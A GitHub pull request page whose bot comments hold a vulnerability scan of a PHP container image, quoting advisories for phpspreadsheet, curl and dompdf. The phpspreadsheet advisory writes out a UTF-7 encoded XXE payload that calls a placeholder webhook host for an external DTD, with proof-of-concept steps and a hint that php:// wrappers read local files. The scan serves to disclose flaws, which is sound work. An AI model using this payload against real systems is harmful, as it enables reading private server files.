Try catches added

[bbrands02]

No description provided.

[github-actions]

👋 @bbrands02
Thank you for raising your pull request.
Please make sure you have followed our contributing guidelines. We will review it as soon as possible. In the meanwhile make sure your PR checks the following boxes

• Is based on an issue
• Has been locally tested
• Has been tested with the admin UI
• Has been discussed with the development team in an open channel

[github-actions]

Your image	ghcr.io/commongateway/wooservice-php:prod
Current base image	php:8.2-fpm-alpine
Updated base image	php:8.3-fpm-alpine

[github-actions]

🔍 Vulnerabilities of ghcr.io/commongateway/wooservice-php:prod

📦 Image Reference ghcr.io/commongateway/wooservice-php:prod

digest	sha256:3b72d86ec8e0c4aabf7dfd120821bcd695d2459a5a38951c8f4dc881ec759b04
vulnerabilities
size	255 MB
packages	316

📦 Base Image php:8.2-fpm-alpine

also known as	8.2-fpm-alpine3.20 8.2.22-fpm-alpine 8.2.22-fpm-alpine3.20
digest	sha256:f445071227e858c52d0aab62372ad4a7b4f939584fd8df3ef04071f953571f1e
vulnerabilities

phpoffice/phpspreadsheet 1.29.0 (composer) pkg:composer/phpoffice/[email protected] Improper Restriction of XML External Entity Reference Affected range <2.2.1 Fixed version 2.2.1 CVSS Score 8.8 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H EPSS Score 0.00043 EPSS Percentile 0.09559 Description Summary Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) Details Check $pattern = '/encoding="(.*?)"/'; easy to bypass. Just use a single quote symbol '. So payload looks like this: <?xml version="1.0" encoding='UTF-7' standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]> If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. PoC Create simple xlsx file Rename xlsx to zip Go to the zip and open the xl/sharedStrings.xml file in edit mode. Replace <?xml version="1.0" encoding="UTF-8" standalone="yes"?> to <?xml version="1.0" encoding='UTF-7' standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]> Save sharedStrings.xml file and rename zip back to xlsx. Use minimal php code that simply opens this xlsx file: use PhpOffice\PhpSpreadsheet\IOFactory; require __DIR__ . '/vendor/autoload.php'; $spreadsheet = IOFactory::load("file.xlsx"); You will receive the request to your http://%webhook%/file.dtd Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files. Impact Read local files Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Affected range <2.1.0 Fixed version 2.1.0 CVSS Score 5.4 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N EPSS Score 0.00045 EPSS Percentile 0.16332 Description Summary \PhpOffice\PhpSpreadsheet\Writer\Html doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page. PoC Example target script: <?php require 'vendor/autoload.php'; $reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx"); $spreadsheet = $reader->load(__DIR__ . '/book.xlsx'); $writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet); print($writer->generateHTMLAll()); Save this file in the same directory: book.xlsx Open index.php in a web browser. An alert should be displayed. Impact Full takeover of the session of users viewing spreadsheet files as HTML.

curl 8.9.0-r0 (apk) pkg:apk/alpine/[email protected]?os_name=alpine&os_version=3.20 Affected range <8.9.1-r0 Fixed version 8.9.1-r0 EPSS Score 0.00056 EPSS Percentile 0.23801 Description

dompdf/dompdf 2.0.4 (composer) pkg:composer/dompdf/[email protected] OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities Affected range <=2.0.4 Fixed version Not Fixed Description Improper Neutralization in dompdf/dompdf.